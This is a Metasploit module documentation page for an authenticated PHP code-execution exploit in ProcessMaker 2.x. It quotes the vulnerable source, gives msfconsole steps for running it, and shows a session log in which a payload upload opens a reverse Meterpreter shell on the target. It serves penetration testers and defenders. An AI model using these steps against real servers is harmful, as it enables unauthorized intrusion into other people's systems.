dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/http/processmaker_exec.md

3.9 KiB
Raw Permalink Blame History

Description

This module exploits a PHP code execution vulnerability in the default neoclassic skin for ProcessMaker Open Source which allows any authenticated user to execute PHP code. The vulnerable skin is installed by default in version 2.x prior to 2.5.2 and cannot be removed via the web interface.

Vulnerable Application

ProcessMaker is an open source, workflow management software suite, which includes tools to automate your workflow, design forms, create documents, assign roles and users, create routing rules, and map an individual process quickly and easily. It's relatively lightweight and doesn't require any kind of installation on the client computer.

This module has been tested successfully on ProcessMaker Open Source versions:

  • 2.5.1 on Windows XP SP3
  • 2.5.0 on Windows XP SP3
  • 2.0.45 on Debian Linux
  • 2.0.23 on Windows XP SP3

The vulnerability was patched in version 2.5.2.

Source and Installers:

Technical Details

Several files within the default neoclassic skin allow authenticated users to supply a PHP function in the action parameter and arguments for the aforementioned function in the params parameter. The application calls the supplied function name with the supplied parameters resulting in execution of arbitrary user supplied PHP code.

The relevant source code for the affected files is shown below.

appFolder/appFolderAjax.php

if (($_REQUEST['action']) != 'rename') {
    $functionName = $_REQUEST ['action'];
    $functionParams = isset ($_REQUEST ['params']) ? $_REQUEST ['params'] : array ();
    $functionName ($functionParams);

cases/casesStartPage_Ajax.php

$functionName = $_REQUEST['action'];
$functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array ();
$functionName( $functionParams );

cases/cases_SchedulerGetPlugins.php

$functionName = $_REQUEST['action'];
$functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array ();
$functionName( $functionParams );

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/multi/http/processmaker_exec
  3. Do: set username [USER]
  4. Do: set password [PASS]
  5. Do: set workspace [WORKSPACE]
  6. Do: set rhost [IP]
  7. Do: run
  8. You should get a session

Options

Username

The username for a ProcessMaker user (default: admin).

Password

The password for the ProcessMaker user (default: admin).

Workspace

The ProcessMaker workspace for which the specified user has access (default: workflow).

Scenarios

msf exploit(processmaker_exec) > check
[*] 192.168.172.135:80 - Authenticating as user 'admin'
[+] 192.168.172.135:80 - Authenticated as user 'admin'
[*] 192.168.172.135:80 - Sending check
[+] The target is vulnerable.

msf exploit(processmaker_exec) > exploit
[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.135:80 - Authenticating as user 'admin'
[+] 192.168.172.135:80 - Authenticated as user 'admin'
[*] 192.168.172.135:80 - Sending payload 'V7hd5EevO9Ho.php' (1795 bytes)
[+] 192.168.172.135:80 - Payload sent successfully
[*] 192.168.172.135:80 - Retrieving file 'V7hd5EevO9Ho.php'
[*] Sending stage (39195 bytes) to 192.168.172.135
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.135:32789) at 2013-10-29 09:53:08 -0500
[+] Deleted V7hd5EevO9Ho.php

^C[-] Exploit failed: Interrupt

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : processmaker
OS          : Linux processmaker 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64
Meterpreter : php/php
meterpreter > exit